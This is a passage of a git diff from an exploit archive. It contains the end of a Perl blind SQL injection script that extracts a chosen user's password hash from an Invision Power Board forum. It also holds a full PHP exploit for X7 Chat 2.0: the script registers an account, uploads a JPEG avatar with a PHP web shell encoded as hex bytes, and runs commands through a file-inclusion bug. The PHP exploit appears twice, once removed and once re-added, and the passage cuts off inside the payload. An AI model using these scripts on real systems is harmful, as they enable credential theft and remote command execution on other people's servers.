= '?act=Msg&CODE=04'; +my $pose_pm_page = '?'; +my $tries = 5; +my $sql = ''; +my $hash = ''; +my $need_null = 0; +my $i; +my $j; +my @charset = ('0' .. '9', 'a' .. 
'f'); +my %form = (act => 'Msg', + CODE => '04', + MODE => '01', + OID => '', + removeattachid => '', + msg_title => 'asdf', + bbmode => 'normal', + ffont => 0, + fsize => 0, + fcolor => 0, + LIST => ' LIST ', + helpbox => 'Insert Monotype Text (alt + p)', + tagcount => 0, + Post => 'jkl'); + + +# objects +my $ua = LWP::UserAgent->new; +my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); +my $resp; + +# init the cookie jar +$ua->cookie_jar ($cj); + +# allow redirects on post requests +push @{ $ua->requests_redirectable }, "POST"; + +# get user input +print 'IPB Forum URL ? '; +chomp (my $base_url = <STDIN>); +print 'Your username ? '; +chomp (my $user = <STDIN>); +$form{entered_name} = $user; +print 'Your pass ? '; +# systems without stty will error otherwise +my $stty = -x '/bin/stty'; +system 'stty -echo' if $stty; # to turn off echoing +chomp (my $pass = <STDIN>); +system 'stty echo' if $stty; # to turn it back on +print "\n" if $stty; +print 'Target userid ? '; # it'll say next to one of their posts +chomp (my $tid = <STDIN>); + +# parse the given base url +if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } +if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } + +do { + $resp = $ua->post ($base_url . $login_page, + [ UserName => $user, + PassWord => $pass, + CookieDate => 1, + ]); +} while ($tries-- && !$resp->is_success()); + +# reset tries +$tries = 5; + +# did we get 200 (OK) ? +if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } + +# was the pass right ? +if ($resp->content =~ /sorry, the password was wrong/i) { + die "Error: password incorrect.\n"; +} + +# get ourselves a post_key (and an auth_key too with newer versions) +do { + $resp = $ua->get ($base_url . $pm_page); +} while ($tries-- && !$resp->is_success()); + +# reset tries +$tries = 5; + +if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . 
"\n" } +if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#) +{ + $form{post_key} = $1; +} else { + die "Error: couldn't get a post key.\n"; +} +if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#) +{ + $form{auth_key} = $1; +} + +# turn off buffering so chars in the hash show up straight away +$| = 1; + +print "\nAttempting to extract password hash from database...\n "; + +OFFSET: +for ($i = 0; $i < 32; ++$i) { + CHAR: + for ($j = 0; $j < @charset; ++$j) { + # reset tries + $tries = 5; + print "\x08", $charset[$j]; + # build sql injection + $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' + . (join (',', map {ord} split ('', $user))) . ') FROM ' + . 'ibf_members WHERE id = ' . $tid . ' AND MID(' + . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' + . ord ($charset[$j]) . ')'; + $form{from_contact} = $sql; + $resp = $ua->post ($base_url . $post_pm_page, \%form, + referer => $base_url . $pm_page); + if (!$resp->is_success()) { + die "\nError: " . $resp->status_line + . "\n" if (!$tries); + --$tries; + redo; + } + if ($resp->content =~ /sql error/i) { + if ($need_null) { + die "Error: SQL error.\n"; + } else { + $need_null = 1; + redo OFFSET; + } + } elsif ($resp->content !~ /there is no such member/i) { + # we have a winner ! + print ' '; + next OFFSET; + } + } + # uh oh, something went wrong + die "\nError: couldn't get a char for offset $i\n"; +} +print "\x08 \x08\nHit enter to quit.\n"; +<STDIN>; + +# milw0rm.com [2006-05-01] diff --git a/platforms/php/webapps/1738.php b/platforms/php/webapps/1738.php index e17a87411..b54068e32 100755 --- a/platforms/php/webapps/1738.php +++ b/platforms/php/webapps/1738.php 
@@ -1,283 +1,283 @@ -#!/usr/bin/php -q -d short_open_tag=on -<? -echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n"; -echo "by rgod rgod@autistici.org\r\n"; -echo "site: http://retrogod.altervista.org\r\n"; -echo "-> works regardless of magic_quotes_gpc settings\r\n"; -echo " if avatar uploads are enabled (default)\r\n"; -echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n"; - -if ($argc<4) { -echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; -echo "host: target server (ip/hostname)\r\n"; -echo "path: path to X7\r\n"; -echo "cmd: a shell command\r\n"; -echo "Options:\r\n"; -echo " -p[port]: specify a port other than 80\r\n"; -echo " -P[ip:port]: specify a proxy\r\n"; -echo "Examples:\r\n"; -echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n"; -echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n"; -echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; -die; -} - -/* - software site: http://www.x7chat.com/ - description: "X7 Chat is free, open source, software written in PHP" - - vulnerable code in help/index.php at lines 32-37: - - ... - if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){ - $_GET['help_file'] = "main"; - } - - // Load the help definitions - include("./{$_GET['help_file']}"); -... 
- -so, you can view/include all files on target system, poc: - -http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd - -this tool upload an avatar with php code as EXIF metadata content, then: - -http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la - */ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} - - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -srand(make_seed()); -$v = rand(1,99); - -echo "step 1 -> register...\r\n"; -$data="username=suntzu".$v; -$data.="&pass1=suntzu"; -$data.="&pass2=suntzu"; -$data.="&email=suntzu".$v."@hotmail.com"; -$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -echo "step 2 -> login...\r\n"; -$data="dologin=dologin"; -$data.="&username=suntzu".$v; -$data.="&password=suntzu"; -$packet="POST ".$p."index.php HTTP/1.0\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); 
-sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[1]);$cookie=$temp2[0]; -$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0]; -if ($cookie=="") {die("Failed to login...\r\n");} -echo "Cookie -> ".$cookie."\r\n"; -echo "step 3 -> upload an avatar...\r\n"; -$shell= -chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20). -chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67). -chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65). -chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29). -chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49). -chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d). -chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c). -chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f). -chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27). -chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d). -chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f). -chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e). -chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69). -chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22). -chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63). -chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69). -chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35). -chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a). 
-chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75). -chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49). -chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d). -chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f). -chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22). -chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). -chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). -chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). -chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). -chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). -chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). -chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09). -chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). -chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14). -chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01). -chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00). -chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00); - -$data='-----------------------------7d63ba6e09fc -Content-Disposition: form-data; name="MAX_FILE_SIZE" - -5242880 ------------------------------7d63ba6e09fc -Content-Disposition: form-data; name="avatar"; filename="whatever.jpg" -Content-Type: image/jpeg - -'.$shell.' 
------------------------------7d63ba6e09fc-- -'; - -echo "step 4 -> launch commands...\r\n"; -$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -#debug -#echo quick_dump($packet); -sendpacketii($packet); - -$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg"); -$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#debug -#echo quick_dump($packet); -sendpacketii($packet); -if (strstr($html,"56789")) - { - echo "Exploit succeeded...\r\n\r\n"; - $temp=explode("56789",$html); - echo $temp[1]; - die; - } -//if you are here... -echo "Exploit failed..."; -?> - -# milw0rm.com [2006-05-02] +#!/usr/bin/php -q -d short_open_tag=on +<? +echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n"; +echo "by rgod rgod@autistici.org\r\n"; +echo "site: http://retrogod.altervista.org\r\n"; +echo "-> works regardless of magic_quotes_gpc settings\r\n"; +echo " if avatar uploads are enabled (default)\r\n"; +echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n"; + +if ($argc<4) { +echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to X7\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n"; +echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n"; +echo "php ".$argv[0]." 
localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +/* + software site: http://www.x7chat.com/ + description: "X7 Chat is free, open source, software written in PHP" + + vulnerable code in help/index.php at lines 32-37: + + ... + if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){ + $_GET['help_file'] = "main"; + } + + // Load the help definitions + include("./{$_GET['help_file']}"); +... + +so, you can view/include all files on target system, poc: + +http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd + +this tool upload an avatar with php code as EXIF metadata content, then: + +http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la + */ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +srand(make_seed()); +$v = rand(1,99); + +echo "step 1 -> register...\r\n"; +$data="username=suntzu".$v; +$data.="&pass1=suntzu"; +$data.="&pass2=suntzu"; +$data.="&email=suntzu".$v."@hotmail.com"; +$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); +sendpacketii($packet); + +echo "step 2 -> login...\r\n"; +$data="dologin=dologin"; +$data.="&username=suntzu".$v; +$data.="&password=suntzu"; +$packet="POST ".$p."index.php HTTP/1.0\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +#debug +#echo quick_dump($packet); 
+sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(" ",$temp[1]);$cookie=$temp2[0]; +$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0]; +if ($cookie=="") {die("Failed to login...\r\n");} +echo "Cookie -> ".$cookie."\r\n"; +echo "step 3 -> upload an avatar...\r\n"; +$shell= +chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20). +chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67). +chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65). +chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29). +chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49). +chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d). +chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c). +chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f). +chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27). +chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d). +chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f). +chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e). +chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69). +chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22). +chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63). +chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69). +chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35). +chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a). 
+chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75). +chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49). +chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d). +chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f). +chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22). +chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). +chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). +chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). +chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). +chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). +chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). +chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09). +chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). +chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14). +chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). 